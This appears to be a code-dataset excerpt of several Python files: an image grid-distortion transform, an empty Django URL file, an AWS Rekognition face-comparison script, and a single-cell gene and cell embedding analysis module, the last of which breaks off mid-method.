        out: NdarrayOrTensor = self.resampler(
            img, grid, mode=mode or self.mode, padding_mode=padding_mode or self.padding_mode
        )
        return out
class GridDistortion(Transform):
    """Deterministically distort an image along a grid of control cells.

    ``distort_steps`` holds, per spatial dimension, one multiplicative step
    factor per grid cell; each cell of the sampling grid is stretched or
    compressed by its factor and the image is resampled on the result.
    """
    backend = [TransformBackends.TORCH]
    def __init__(
        self,
        num_cells: Union[Tuple[int], int],
        distort_steps: Sequence[Sequence[float]],
        mode: Union[GridSampleMode, str] = GridSampleMode.BILINEAR,
        padding_mode: Union[GridSamplePadMode, str] = GridSamplePadMode.BORDER,
        device: Optional[torch.device] = None,
    ) -> None:
        """
        Args:
            num_cells: number of grid cells per spatial dimension (int or tuple).
            distort_steps: per-dimension sequence of step factors applied to
                successive cells (num_cells + 1 entries per dimension).
            mode: interpolation mode used by the resampler.
            padding_mode: out-of-bounds padding mode used by the resampler.
            device: device on which the resampling runs.
        """
        self.resampler = Resample(mode=mode, padding_mode=padding_mode, device=device)
        self.num_cells = num_cells
        self.distort_steps = distort_steps
        self.device = device
    def __call__(
        self,
        img: NdarrayOrTensor,
        distort_steps: Optional[Sequence[Sequence]] = None,
        mode: Optional[Union[GridSampleMode, str]] = None,
        padding_mode: Optional[Union[GridSamplePadMode, str]] = None,
    ) -> NdarrayOrTensor:
        """Apply the grid distortion to channel-first ``img``.

        Raises:
            ValueError: if ``distort_steps`` does not provide exactly one
                sequence per spatial dimension of ``img``.
        """
        distort_steps = self.distort_steps if distort_steps is None else distort_steps
        if len(img.shape) != len(distort_steps) + 1:
            raise ValueError("the spatial size of `img` does not match with the length of `distort_steps`")
        all_ranges = []
        num_cells = ensure_tuple_rep(self.num_cells, len(img.shape) - 1)
        # Build, per dimension, a distorted 1-D coordinate ramp: each cell of
        # cell_size voxels advances by cell_size * step instead of cell_size.
        for dim_idx, dim_size in enumerate(img.shape[1:]):
            dim_distort_steps = distort_steps[dim_idx]
            ranges = torch.zeros(dim_size, dtype=torch.float32)
            cell_size = dim_size // num_cells[dim_idx]
            prev = 0
            for idx in range(num_cells[dim_idx] + 1):
                start = int(idx * cell_size)
                end = start + cell_size
                if end > dim_size:
                    # Last partial cell: clamp to the image edge.
                    end = dim_size
                    cur = dim_size
                else:
                    cur = prev + cell_size * dim_distort_steps[idx]
                ranges[start:end] = torch.linspace(prev, cur, end - start)
                prev = cur
            # Center the coordinates around 0 for the resampling grid.
            ranges = ranges - (dim_size - 1.0) / 2.0
            all_ranges.append(ranges)
        coords = meshgrid_ij(*all_ranges)
        # Stack the coordinate channels plus a homogeneous ones-channel.
        grid = torch.stack([*coords, torch.ones_like(coords[0])])
        return self.resampler(img, grid=grid, mode=mode, padding_mode=padding_mode)
class RandGridDistortion(RandomizableTransform):
    """Random version of :class:`GridDistortion`.

    With probability ``prob``, samples one step factor per grid cell from
    ``1 + U(distort_limit)`` in every spatial dimension and applies the
    resulting grid distortion.
    """
    backend = [TransformBackends.TORCH]
    def __init__(
        self,
        num_cells: Union[Tuple[int], int] = 5,
        prob: float = 0.1,
        distort_limit: Union[Tuple[float, float], float] = (-0.03, 0.03),
        mode: Union[GridSampleMode, str] = GridSampleMode.BILINEAR,
        padding_mode: Union[GridSamplePadMode, str] = GridSamplePadMode.BORDER,
        device: Optional[torch.device] = None,
    ) -> None:
        """
        Args:
            num_cells: number of grid cells per spatial dimension.
            prob: probability of applying the distortion.
            distort_limit: scalar or (low, high) range of the random step
                perturbation; a scalar x is expanded to (-|x| .. |x|).
            mode: interpolation mode, forwarded to GridDistortion.
            padding_mode: padding behavior, forwarded to GridDistortion.
            device: device on which the resampling runs.
        """
        RandomizableTransform.__init__(self, prob)
        self.num_cells = num_cells
        # Normalize distort_limit to an ordered (low, high) pair.
        if isinstance(distort_limit, (int, float)):
            self.distort_limit = (min(-distort_limit, distort_limit), max(-distort_limit, distort_limit))
        else:
            self.distort_limit = (min(distort_limit), max(distort_limit))
        # Placeholder; the real steps are sampled per-call in randomize().
        self.distort_steps: Sequence[Sequence[float]] = ((1.0,),)
        self.grid_distortion = GridDistortion(
            num_cells=num_cells, distort_steps=self.distort_steps, mode=mode, padding_mode=padding_mode, device=device
        )
    def randomize(self, spatial_shape: Sequence[int]) -> None:
        """Sample ``num_cells + 1`` step factors per spatial dimension,
        but only when the probability gate fires."""
        super().randomize(None)
        if not self._do_transform:
            return
        self.distort_steps = tuple(
            tuple(1.0 + self.R.uniform(low=self.distort_limit[0], high=self.distort_limit[1], size=n_cells + 1))
            for n_cells in ensure_tuple_rep(self.num_cells, len(spatial_shape))
        )
    def __call__(
        self,
        img: NdarrayOrTensor,
        mode: Optional[Union[GridSampleMode, str]] = None,
        padding_mode: Optional[Union[GridSamplePadMode, str]] = None,
        randomize: bool = True,
    ) -> NdarrayOrTensor:
        """Apply a (freshly sampled unless ``randomize=False``) grid
        distortion to ``img``; returns ``img`` unchanged when the gate is off."""
        if randomize:
            self.randomize(img.shape[1:])
        if not self._do_transform:
            return img
        return self.grid_distortion(img, distort_steps=self.distort_steps, mode=mode, padding_mode=padding_mode)
| true | true |
f7327b0acca1ec68ef13a676068181bf6461221b | 43 | py | Python | passbook/audit/urls.py | fossabot/passbook | cba17f6659404445ac3025f11657d89368cc8b4f | [
"MIT"
] | null | null | null | passbook/audit/urls.py | fossabot/passbook | cba17f6659404445ac3025f11657d89368cc8b4f | [
"MIT"
] | null | null | null | passbook/audit/urls.py | fossabot/passbook | cba17f6659404445ac3025f11657d89368cc8b4f | [
"MIT"
] | null | null | null | """passbook audit urls"""
urlpatterns = []
| 14.333333 | 25 | 0.651163 | urlpatterns = []
| true | true |
f7327ef8305d5caec9af3eb2d964b224057a2427 | 1,539 | py | Python | AI/others/aws_rekognition/test_compare_faces/main.py | honchardev/Fun | ca7c0076e9bb3017c5d7e89aa7d5bd54a83c8ecc | [
"MIT"
] | null | null | null | AI/others/aws_rekognition/test_compare_faces/main.py | honchardev/Fun | ca7c0076e9bb3017c5d7e89aa7d5bd54a83c8ecc | [
"MIT"
] | 3 | 2020-03-24T16:26:35.000Z | 2020-04-15T19:40:41.000Z | AI/others/aws_rekognition/test_compare_faces/main.py | honchardev/Fun | ca7c0076e9bb3017c5d7e89aa7d5bd54a83c8ecc | [
"MIT"
] | null | null | null | from dotenv import load_dotenv
import os
import boto3
# Define constants
load_dotenv()
AWS_USERNAME = os.environ['aws_username']
AWS_BUCKET = os.environ['aws_bucket']
AWS_REGION = os.environ['aws_region']
AWS_ACCESS_KEY_ID = os.environ['aws_access_key_id']
AWS_SECRET_ACCESS_KEY = os.environ['aws_secret_access_key']
# Initialize rekognition client
aws_rekognition_client = boto3.client(
service_name='rekognition',
region_name=AWS_REGION,
aws_access_key_id=AWS_ACCESS_KEY_ID,
aws_secret_access_key=AWS_SECRET_ACCESS_KEY
)
print('DBG: Client initialized')
# Preload images
img_folder_path = './img'
me_and_passport_img_filename = '2020-10-16-114752.jpg'
me_img_filename = '2020-10-16-114805.jpg'
passport_img_filename = '2020-10-16-114818.jpg'
me_and_passport_img_bytes = open('{0}/{1}'.format(img_folder_path, me_and_passport_img_filename), 'rb').read()
me_img_bytes = open('{0}/{1}'.format(img_folder_path, me_img_filename), 'rb').read()
passport_img_bytes = open('{0}/{1}'.format(img_folder_path, passport_img_filename), 'rb').read()
print('DBG: Images preloaded')
# Fetch compare_faces results
compare_faces_params = {
'SourceImage': {
'Bytes': me_img_bytes
},
'TargetImage': {
'Bytes': passport_img_bytes
},
'SimilarityThreshold': 70,
'QualityFilter': 'AUTO' # 'NONE'|'AUTO'|'LOW'|'MEDIUM'|'HIGH'
}
response = aws_rekognition_client.compare_faces(**compare_faces_params)
print(response)
print('DBG: Fetched response from compare_faces')
print('DBG: end of script')
| 27.482143 | 110 | 0.747238 | from dotenv import load_dotenv
import os
import boto3
load_dotenv()
AWS_USERNAME = os.environ['aws_username']
AWS_BUCKET = os.environ['aws_bucket']
AWS_REGION = os.environ['aws_region']
AWS_ACCESS_KEY_ID = os.environ['aws_access_key_id']
AWS_SECRET_ACCESS_KEY = os.environ['aws_secret_access_key']
aws_rekognition_client = boto3.client(
service_name='rekognition',
region_name=AWS_REGION,
aws_access_key_id=AWS_ACCESS_KEY_ID,
aws_secret_access_key=AWS_SECRET_ACCESS_KEY
)
print('DBG: Client initialized')
img_folder_path = './img'
me_and_passport_img_filename = '2020-10-16-114752.jpg'
me_img_filename = '2020-10-16-114805.jpg'
passport_img_filename = '2020-10-16-114818.jpg'
me_and_passport_img_bytes = open('{0}/{1}'.format(img_folder_path, me_and_passport_img_filename), 'rb').read()
me_img_bytes = open('{0}/{1}'.format(img_folder_path, me_img_filename), 'rb').read()
passport_img_bytes = open('{0}/{1}'.format(img_folder_path, passport_img_filename), 'rb').read()
print('DBG: Images preloaded')
compare_faces_params = {
'SourceImage': {
'Bytes': me_img_bytes
},
'TargetImage': {
'Bytes': passport_img_bytes
},
'SimilarityThreshold': 70,
'QualityFilter': 'AUTO'
}
response = aws_rekognition_client.compare_faces(**compare_faces_params)
print(response)
print('DBG: Fetched response from compare_faces')
print('DBG: end of script')
| true | true |
f7327eff75f87ec7bbe56c0c96e4299744d97d89 | 22,181 | py | Python | compass/embedding.py | seitalab/compass | b08b0b711875e8e049ff07793ffe1446a6c3f144 | [
"MIT"
] | null | null | null | compass/embedding.py | seitalab/compass | b08b0b711875e8e049ff07793ffe1446a6c3f144 | [
"MIT"
] | null | null | null | compass/embedding.py | seitalab/compass | b08b0b711875e8e049ff07793ffe1446a6c3f144 | [
"MIT"
] | null | null | null | from sklearn.metrics.pairwise import cosine_similarity
from sklearn.manifold import TSNE
from sklearn.cluster import AgglomerativeClustering, KMeans
from sklearn.preprocessing import MinMaxScaler
import matplotlib.pyplot as plt
import matplotlib
import seaborn as sns
import pandas
import matplotlib.cm as cm
import umap
import tqdm
import scanpy as sc
import matplotlib.gridspec as gridspec
import networkx as nx
import numpy
import operator
import random
import pickle
import collections
import sys
import os
class GeneEmbedding(object):
    """Gene-level embedding loaded from a word2vec-style text file.

    Restricts the embedding to the genes expressed in ``context`` and
    provides cosine-similarity queries, k-means clustering of genes,
    cluster summaries and t-SNE/UMAP plotting helpers.
    """

    def __init__(self, embedding_file, context):
        self.vector = []
        self.context = context
        self.embedding_file = embedding_file
        self.embeddings = self.read_embedding(self.embedding_file)
        self.vector = []
        self.genes = []
        # Keep only expressed genes that actually have an embedding,
        # preserving order; self.genes and self.vector are parallel lists.
        for gene in tqdm.tqdm(self.context.expressed_genes):
            if gene in self.embeddings:
                self.vector.append(self.embeddings[gene])
                self.genes.append(gene)

    def read_embedding(self, filename):
        """Parse a word2vec-format text file into ``{gene: [float, ...]}``.

        The first line (the word2vec header) is skipped.
        """
        embedding = dict()
        # "with" guarantees the handle is closed (the original leaked it).
        with open(filename, "r") as handle:
            lines = handle.read().splitlines()[1:]
        for line in lines:
            vector = line.split()
            gene = vector.pop(0)
            embedding[gene] = [float(x) for x in vector]
        return embedding

    def compute_similarities(self, gene, subset=None):
        """Return a DataFrame of genes ranked by cosine similarity to ``gene``.

        Args:
            gene: query gene symbol; returns None if it has no embedding.
            subset: optional iterable restricting the comparison targets.

        Returns:
            DataFrame with columns "Gene" and "Similarity", most similar first.
        """
        # Fixed: removed leftover debug print("hit").
        if gene not in self.embeddings:
            return None
        embedding = self.embeddings[gene]
        distances = dict()
        if subset:
            targets = set(list(self.embeddings.keys())).intersection(set(subset))
        else:
            targets = list(self.embeddings.keys())
        for target in targets:
            if target not in self.embeddings:
                continue
            v = self.embeddings[target]
            distance = float(cosine_similarity(numpy.array(embedding).reshape(1, -1), numpy.array(v).reshape(1, -1))[0])
            distances[target] = distance
        sorted_distances = list(reversed(sorted(distances.items(), key=operator.itemgetter(1))))
        genes = [x[0] for x in sorted_distances]
        distance = [x[1] for x in sorted_distances]
        df = pandas.DataFrame.from_dict({"Gene": genes, "Similarity": distance})
        return df

    def cluster(self, n=12):
        """K-means cluster the gene vectors; returns labels like "G3".

        NOTE(review): labels are zipped against context.expressed_genes,
        which assumes every expressed gene had an embedding — confirm
        upstream, otherwise labels and genes drift out of alignment.
        """
        kmeans = KMeans(n_clusters=n)
        kmeans.fit(self.vector)
        clusters = kmeans.labels_
        clusters = zip(self.context.expressed_genes, clusters)
        _clusters = []
        for gene, cluster in clusters:
            _clusters.append("G" + str(cluster))
        return _clusters

    def clusters(self, clusters):
        """Per cluster label, compute the mean gene vector centered on the
        dataset-wide mean; also return the genes belonging to each cluster."""
        average_vector = dict()
        gene_to_cluster = collections.defaultdict(list)
        matrix = collections.defaultdict(list)
        total_average_vector = []
        for gene, cluster in zip(self.context.expressed_genes, clusters):
            if gene in self.embeddings:
                matrix[cluster].append(self.embeddings[gene])
                gene_to_cluster[cluster].append(gene)
                total_average_vector.append(self.embeddings[gene])
        self.total_average_vector = list(numpy.average(total_average_vector, axis=0))
        for cluster, vectors in matrix.items():
            xvec = list(numpy.average(vectors, axis=0))
            # Center each cluster centroid on the overall average vector.
            average_vector[cluster] = numpy.subtract(xvec, self.total_average_vector)
        return average_vector, gene_to_cluster

    def generate_vector(self, genes):
        """Return the element-wise median of the vectors of ``genes``
        (genes without an embedding are silently ignored)."""
        vector = []
        for gene, vec in zip(self.genes, self.vector):
            if gene in genes:
                vector.append(vec)
        return list(numpy.median(vector, axis=0))

    def cluster_definitions(self, clusters):
        """For each cluster, rank its member genes by cosine similarity to
        the centered cluster centroid (most representative genes first)."""
        average_vector, gene_to_cluster = self.clusters(clusters)
        similarities = collections.defaultdict(dict)
        for cluster, vector in average_vector.items():
            distances = dict()
            for target in gene_to_cluster[cluster]:
                v = self.embeddings[target]
                distance = float(cosine_similarity(numpy.array(vector).reshape(1, -1), numpy.array(v).reshape(1, -1))[0])
                distances[target] = distance
            sorted_distances = list(reversed(sorted(distances.items(), key=operator.itemgetter(1))))
            similarities[cluster] = [x[0] for x in sorted_distances if x[0]]
        return similarities

    def cluster_definitions_as_df(self, similarities, top_n=20):
        """Summarize cluster definitions as a DataFrame with columns
        "Cluster Name" and "Top Genes" (comma-joined top ``top_n``)."""
        clusters = []
        symbols = []
        for key, genes in similarities.items():
            clusters.append(key)
            symbols.append(", ".join(genes[:top_n]))
        df = pandas.DataFrame.from_dict({"Cluster Name": clusters, "Top Genes": symbols})
        return df

    def plot(self, clusters, png=None, method="TSNE", labels=[], pcs=None, remove=[]):
        """Scatter-plot the gene embedding in 2-D, optionally saving to ``png``.

        Returns the 2-D coordinates so later calls can pass them back as
        ``pcs`` and skip the expensive projection.
        """
        plt.figure(figsize=(8, 8))
        ax = plt.subplot(1, 1, 1)
        pcs = self.plot_reduction(clusters, ax, labels=labels, method=method, pcs=pcs, remove=remove)
        if png:
            plt.savefig(png)
            plt.close()
        else:
            plt.show()
        return pcs

    def plot_reduction(self, clusters, ax, method="TSNE", labels=[], pcs=None, remove=[]):
        """Project gene vectors to 2-D (t-SNE or UMAP) and scatter onto
        ``ax`` colored by cluster; clusters listed in ``remove`` are dropped.

        NOTE(review): the mutable default arguments (labels=[], remove=[])
        are kept for interface compatibility; they are only read here.
        """
        if type(pcs) != numpy.ndarray:
            if method == "TSNE":
                print("Running t-SNE")
                pca = TSNE(n_components=2, n_jobs=-1, metric="cosine")
                pcs = pca.fit_transform(self.vector)
                pcs = numpy.transpose(pcs)
                print("Finished.")
            else:
                print("Running UMAP")
                trans = umap.UMAP(random_state=42, metric='cosine').fit(self.vector)
                x = trans.embedding_[:, 0]
                y = trans.embedding_[:, 1]
                pcs = [x, y]
                print("Finished.")
        if len(remove) != 0:
            # Filter out points whose cluster label is in `remove`.
            _pcsx = []
            _pcsy = []
            _clusters = []
            for x, y, c in zip(pcs[0], pcs[1], clusters):
                if c not in remove:
                    _pcsx.append(x)
                    _pcsy.append(y)
                    _clusters.append(c)
            pcs = []
            pcs.append(_pcsx)
            pcs.append(_pcsy)
            clusters = _clusters
        data = {"x": pcs[0], "y": pcs[1], "Cluster": clusters}
        df = pandas.DataFrame.from_dict(data)
        sns.scatterplot(data=df, x="x", y="y", hue="Cluster", ax=ax)
        plt.xlabel("{}-1".format(method))
        plt.ylabel("{}-2".format(method))
        ax.set_xticks([])
        ax.set_yticks([])
        if len(labels):
            for x, y, gene in zip(pcs[0], pcs[1], self.context.expressed_genes):
                if gene in labels:
                    ax.text(x + .02, y, str(gene), fontsize=8)
        return pcs

    def subtract_vector(self, vector):
        """Subtract ``vector`` from every stored gene embedding in place."""
        for gene, vec in self.embeddings.items():
            # Fixed: the original called numpy.subtract(vec - vector), which
            # always raised (subtract needs two arguments; list - list is
            # invalid anyway).
            self.embeddings[gene] = numpy.subtract(vec, vector)

    @staticmethod
    def relabel_cluster(similarities, clusters, old_label, new_label):
        """Rename a cluster in both the similarity dict (in place) and the
        label list (copied); returns the updated pair."""
        genes = similarities[old_label]
        del similarities[old_label]
        similarities[new_label] = genes
        _clusters = []
        for cluster in clusters:
            if cluster == old_label:
                _clusters.append(new_label)
            else:
                _clusters.append(cluster)
        return similarities, _clusters

    def plot_similarity_matrix(self, markers, marker_labels=None, png=None):
        """Cluster-map of pairwise cosine similarities between ``markers``
        (restricted to markers that have an embedding)."""
        cmap = matplotlib.cm.tab20
        if marker_labels:
            marker_colors = {}
            ctypes = []
            for value in marker_labels.values():
                ctypes.append(value)
            ctypes = list(set(ctypes))
            for key, value in marker_labels.items():
                marker_colors[key] = cmap(ctypes.index(value))
            colors = pandas.DataFrame(markers)[0].map(marker_colors)
        similarity_matrix = []
        print("Running")
        markers = set(list(self.embeddings.keys())).intersection(set(markers))
        markers = list(markers)
        for marker in markers:
            print(marker)
            row = []
            res = self.compute_similarities(marker, subset=markers)
            resdict = dict(zip(res["Gene"], res["Similarity"]))
            for gene in markers:
                row.append(resdict[gene])
            similarity_matrix.append(row)
        plt.figure(figsize=(12, 10))
        matrix = numpy.array(similarity_matrix)
        df = pandas.DataFrame(matrix, index=markers, columns=markers)
        sns.clustermap(df, figsize=(12, 8), dendrogram_ratio=0.1)
        plt.tight_layout()
        if png:
            # Fixed: honor the caller-supplied filename; the original always
            # wrote "marker_similarity.png" and ignored ``png``.
            plt.savefig(png)
        else:
            plt.show()

    def plot_similarity_network(self, markers, marker_labels=None, png=None):
        """Draw a similarity network: each marker connects to up to its ten
        nearest neighbor genes, edges weighted/labelled by cosine similarity.

        NOTE(review): the neighbor-coloring below dereferences
        ``marker_labels`` unconditionally, so despite the default this
        argument is effectively required — confirm callers always pass it.
        """
        cmap = matplotlib.cm.tab20
        # Fixed: start from an empty graph. The original seeded a Petersen
        # graph (nodes 0-9) only to delete exactly those nodes again before
        # drawing; also removed leftover debug prints.
        G = nx.Graph()
        node_color = []
        node_order = []
        node_size = []
        edge_order = []
        edge_color = []
        edge_labels = dict()
        for marker in markers:
            node_order.append(marker)
            if marker_labels:
                ctypes = []
                for value in marker_labels.values():
                    ctypes.append(value)
                ctypes = list(set(ctypes))
                node_color.append(ctypes.index(marker_labels[marker]))
            node_size.append(400)
            G.add_node(marker)
        for marker in markers:
            res = self.compute_similarities(marker)
            resdict = dict(zip(res["Gene"], res["Similarity"]))
            i = 0
            for gene, similarity in resdict.items():
                if i > 9: break
                if gene != marker:
                    if gene not in G.nodes():
                        # Neighbor genes get size 0 (label only) and a shared
                        # out-of-palette color index.
                        node_size.append(0)
                        G.add_node(gene)
                        node_order.append(gene)
                        node_color.append(len(set(marker_labels.values())))
                    G.add_edge(marker, gene, weight=similarity)
                    edge_color.append(similarity)
                    edge_order.append((marker, gene))
                    edge_labels[(marker, gene)] = str(round(similarity, 2))
                    i += 1
        fig = plt.figure(figsize=(8, 8))
        ax = plt.subplot(1, 1, 1)
        pos = nx.nx_agraph.graphviz_layout(G, prog="neato", args="-Goverlap=scale -Elen=5 -Eweight=0.2")
        nx.draw(G, pos, ax=ax, cmap=cmap, nodelist=node_order, node_size=node_size, edgelist=edge_order, node_color=node_color, edge_color=edge_color, edge_vmin=0, edge_vmax=1.0, edge_cmap=plt.cm.Greys, with_labels=True, width=1, font_size=7)
        nx.draw_networkx_edge_labels(G, pos, edge_labels=edge_labels, font_size=6)
        plt.axis('off')
        plt.tight_layout()
        if png:
            plt.savefig(png)
        else:
            plt.show()
class CellEmbedding(object):
    """Cell-level embedding built from a gene embedding.

    Each cell is represented as the expression-weighted average of its
    genes' vectors, centered on the dataset-wide average vector.
    """

    def __init__(self, context, embed):
        cell_to_gene = list(context.cell_to_gene.items())
        self.context = context
        self.embed = embed
        self.expression = context.expression
        self.data = collections.defaultdict(list)
        self.weights = collections.defaultdict(list)
        # Collect, per cell, the embedded vectors of its positively
        # expressed genes plus matching expression weights.
        for cell, genes in tqdm.tqdm(cell_to_gene):
            if len(genes) < 2: continue
            if cell in self.expression:
                cell_weights = self.expression[cell]
                for gene in set(genes).intersection(set(embed.embeddings.keys())):
                    if gene in cell_weights:
                        weight = self.expression[cell][gene]
                        if weight > 0:
                            self.data[cell].append(embed.embeddings[gene])
                            self.weights[cell].append(weight)
        self.matrix = []
        dataset_vector = []
        for cell, vectors in self.data.items():
            weights = self.weights[cell]
            xvec = list(numpy.average(vectors, axis=0, weights=weights))
            self.matrix.append(xvec)
            dataset_vector += vectors
        # Center every cell vector on the unweighted dataset-wide average.
        self.dataset_vector = numpy.average(dataset_vector, axis=0)
        _matrix = []
        for vec in self.matrix:
            _matrix.append(numpy.subtract(vec, self.dataset_vector))
        self.matrix = _matrix

    def batch_correct(self, column=None, clusters=None):
        """Within each cluster, shift each non-reference batch's centroid
        onto the reference (first-seen) batch's centroid, then rebuild
        ``self.matrix`` with the per-(cluster, batch) offsets applied.

        Raises:
            ValueError: if either ``column`` or ``clusters`` is missing.
        """
        if not column or not clusters:
            raise ValueError("Must supply batch column and clusters!")
        column_labels = dict(zip(self.context.cells, self.context.metadata[column]))
        labels = []
        for key in self.data.keys():
            labels.append(column_labels[key])
        local_correction = collections.defaultdict(lambda: collections.defaultdict(list))
        correction_vectors = collections.defaultdict(dict)
        for cluster, batch, vec in zip(clusters, labels, self.matrix):
            local_correction[cluster][batch].append(vec)
        for cluster, batches in local_correction.items():
            batch_keys = list(batches.keys())
            # First batch encountered serves as the alignment reference.
            base_batch = batch_keys.pop(0)
            cluster_vec = numpy.average(batches[base_batch], axis=0)
            for batch in batch_keys:
                bvec = list(numpy.average(batches[batch], axis=0))
                # Fixed: compute the offset for every batch. The original only
                # assigned `offset` when this batch's similarity beat the best
                # seen so far, so later batches were stored a stale offset
                # (or hit NameError on the first iteration).
                offset = numpy.subtract(cluster_vec, bvec)
                correction_vectors[cluster][batch] = offset
        self.matrix = []
        self.sample_vector = collections.defaultdict(list)
        i = 0
        self.cell_order = []
        # NOTE(review): the rebuilt vectors are unweighted, uncentered
        # averages, unlike __init__'s weighted centered ones — confirm this
        # asymmetry is intended.
        for cell, vectors in self.data.items():
            cluster = clusters[i]
            xvec = list(numpy.average(vectors, axis=0))
            batch = column_labels[cell]
            if cluster in correction_vectors and batch in correction_vectors[cluster]:
                offset = correction_vectors[cluster][batch]
                xvec = numpy.add(xvec, offset)
            self.matrix.append(xvec)
            self.cell_order.append(cell)
            i += 1

    def cluster(self, k=12):
        """K-means cluster the cell vectors; stores and returns labels
        like "C3"."""
        kmeans = KMeans(n_clusters=k)
        kmeans.fit(self.matrix)
        clusters = kmeans.labels_
        _clusters = []
        for cluster in clusters:
            _clusters.append("C" + str(cluster))
        self.clusters = _clusters
        return _clusters

    def subtract_vector(self, vector):
        """Subtract ``vector`` from every cell vector in ``self.matrix``."""
        corrected_matrix = []
        for cell_vector in self.matrix:
            corrected_matrix.append(numpy.subtract(cell_vector, vector))
        self.matrix = corrected_matrix

    def compute_gene_similarities(self):
        """Per cell cluster, rank all genes by cosine similarity between the
        gene embedding and the cluster's mean cell vector."""
        gene_similarities = dict()
        vectors = collections.defaultdict(list)
        for vec, label in zip(self.matrix, self.clusters):
            vectors[label].append(vec)
        for label, vecs in vectors.items():
            distances = dict()
            cell_vector = list(numpy.mean(vecs, axis=0))
            for gene, vector in self.embed.embeddings.items():
                distance = float(cosine_similarity(numpy.array(cell_vector).reshape(1, -1), numpy.array(vector).reshape(1, -1))[0])
                distances[gene] = distance
            sorted_distances = list(reversed(sorted(distances.items(), key=operator.itemgetter(1))))
            gene_similarities[label] = [x[0] for x in sorted_distances]
            print(label, sorted_distances[:10])
        return gene_similarities

    def group_cell_vectors(self, barcode_to_label):
        """Group cells by label and compute a per-label median vector.

        First pass computes per-label medians of the raw cell vectors;
        second pass recomputes the median after centering each cell's
        vectors on its label's first-pass median.

        NOTE(review): within the second pass the label's vector is
        overwritten once per cell, so for multi-cell labels the result is
        that of the last cell seen — confirm this is intended.
        """
        label_vector = dict()
        labels = []
        for cell, vectors in self.data.items():
            vector = list(numpy.median(vectors, axis=0))
            labels.append(barcode_to_label[cell])
            label_vector[barcode_to_label[cell]] = vector
        for cell, vectors in self.data.items():
            _vectors = []
            for vector in vectors:
                _vectors.append(numpy.subtract(vector, label_vector[barcode_to_label[cell]]))
            vectors = _vectors
            vector = list(numpy.median(vectors, axis=0))
            label_vector[barcode_to_label[cell]] = vector
        return label_vector, labels

    def compute_cell_similarities(self, barcode_to_label):
        """Return the full label-by-label cosine-similarity mapping between
        grouped cell vectors ({label: {label2: similarity}})."""
        cell_similarities = dict()
        vectors, labels = self.group_cell_vectors(barcode_to_label)
        for label, vector in vectors.items():
            distances = dict()
            for label2, vector2 in vectors.items():
                distance = float(cosine_similarity(numpy.array(vector).reshape(1, -1), numpy.array(vector2).reshape(1, -1))[0])
                distances[label2] = distance
            cell_similarities[label] = distances
        return cell_similarities

    def plot_reduction(self, ax, pcs=None, method="TSNE", clusters=None, labels=None):
        """Project ``self.matrix`` to 2-D (t-SNE or UMAP) and scatter onto
        ``ax`` colored by ``clusters``; returns the coordinates for reuse."""
        if type(pcs) != numpy.ndarray:
            if method == "TSNE":
                print("Running t-SNE")
                pca = TSNE(n_components=2, n_jobs=-1, metric="cosine")
                pcs = pca.fit_transform(self.matrix)
                pcs = numpy.transpose(pcs)
                print("Finished.")
            else:
                print("Running UMAP")
                trans = umap.UMAP(random_state=42, metric='cosine').fit(self.matrix)
                x = trans.embedding_[:, 0]
                y = trans.embedding_[:, 1]
                pcs = [x, y]
                print("Finished.")
        data = {"x": pcs[0], "y": pcs[1], "Cluster": clusters}
        df = pandas.DataFrame.from_dict(data)
        sns.scatterplot(data=df, x="x", y="y", hue='Cluster', ax=ax, linewidth=0.1, s=13, alpha=1.0)
        return pcs

    def plot(self, png=None, pcs=None, method="TSNE", column=None):
        """Scatter-plot the cell embedding, colored either by a metadata
        ``column`` or by the stored k-means clusters; optionally save."""
        if column:
            column_labels = dict(zip(self.context.cells, self.context.metadata[column]))
            labels = []
            for key in self.data.keys():
                labels.append(column_labels[key])
        else:
            labels = self.clusters
        plt.figure(figsize=(8, 8))
        ax1 = plt.subplot(1, 1, 1)
        pcs = self.plot_reduction(ax1, pcs=pcs, clusters=labels, method=method)
        plt.xlabel("{}-1".format(method))
        plt.ylabel("{}-2".format(method))
        ax1.set_xticks([])
        ax1.set_yticks([])
        if png:
            plt.savefig(png)
            plt.close()
        else:
            plt.show()
        return pcs

    def plot_distance(self, vector, pcs=None):
        """Color the 2-D cell scatter by each cell's cosine similarity to
        ``vector``, relative to the dataset vector's similarity."""
        plt.figure(figsize=(8, 8))
        ax = plt.subplot(1, 1, 1)
        if type(pcs) != numpy.ndarray:
            pca = TSNE(n_components=2)
            pcs = pca.fit_transform(self.matrix)
            pcs = numpy.transpose(pcs)
        distances = []
        dataset_distance = float(cosine_similarity(numpy.array(vector).reshape(1, -1), numpy.array(self.dataset_vector).reshape(1, -1))[0])
        for cell_vector in self.matrix:
            distance = float(cosine_similarity(numpy.array(cell_vector).reshape(1, -1), numpy.array(vector).reshape(1, -1))[0])
            distances.append(distance - dataset_distance)
        data = {"x": pcs[0], "y": pcs[1], "Distance": distances}
        df = pandas.DataFrame.from_dict(data)
        sns.scatterplot(data=df, x="x", y="y", hue='Distance', ax=ax, linewidth=0.00, s=7, alpha=0.7)
        return pcs

    def plot_gene_tsne(self, title, ax, genes, pcs=None):
        """Color the 2-D cell scatter by the summed expression of ``genes``."""
        expression = [0 for _ in range(len(list(self.data.keys())))]
        for gene in genes:
            for i, cell in enumerate(self.data.keys()):
                if gene in self.expression[cell]:
                    expression[i] += self.expression[cell][gene]
        if type(pcs) != numpy.ndarray:
            pca = TSNE(n_components=2)
            pcs = pca.fit_transform(self.matrix)
            pcs = numpy.transpose(pcs)
        data = {"x": pcs[0], "y": pcs[1], "Gene Expression": expression}
        df = pandas.DataFrame.from_dict(data)
        sns.scatterplot(data=df, x="x", y="y", hue='Gene Expression', ax=ax, linewidth=0.00, s=7, alpha=0.7)
        ax.set_title(title, fontsize=16)
        return pcs

    def plot_gene_expression(self, genes, pcs=None, png=None):
        """Standalone figure wrapper around :meth:`plot_gene_tsne`."""
        plt.figure(figsize=(8, 8))
        ax = plt.subplot(1, 1, 1)
        pcs = self.plot_gene_tsne(",".join(genes[:10]), ax, genes, pcs=pcs)
        ax.set_xticks([])
        ax.set_yticks([])
        if not png:
            plt.show()
        else:
            plt.savefig(png)
            plt.close()
        return pcs

    def plot_similarity_matrix(self, vectors, column, png=None):
        """Cluster-map of cosine similarities between gene-set vectors
        (``vectors``: {cluster: [genes]}) and cell groups labelled by
        metadata ``column``.

        Fixed: the original referenced undefined globals (cembed, embed,
        output_path, sample), misspelled ``ctypes`` and called
        ``row.append()`` without an argument, so it always raised. The
        optional ``png`` argument replaces the hard-coded save path.
        """
        plt.figure(figsize=(12, 10))
        barcode_to_label = dict(zip(self.context.metadata.index, self.context.metadata[column]))
